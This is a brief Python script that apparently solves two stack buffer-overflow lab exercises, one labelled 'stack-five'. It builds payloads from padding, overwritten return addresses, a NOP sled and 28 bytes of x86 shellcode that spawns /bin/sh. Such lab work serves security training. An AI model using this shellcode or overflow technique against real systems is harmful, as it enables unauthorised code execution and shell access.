padding = "AAAAAAAAAAAAAAAAAAAAABBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR"
address = "\x1d\x06\x40"
exploit = padding + address
print(exploit)

# stack-five
# padding = "AAAAAAAAAAAAAAAAAAAAABBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJMMMMNNNNPPPPRRRR"
padding = "\x90"
address = "\xa0\xe5\xff\xff"
# 28 bytes
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
print(padding*108 + shellcode + address)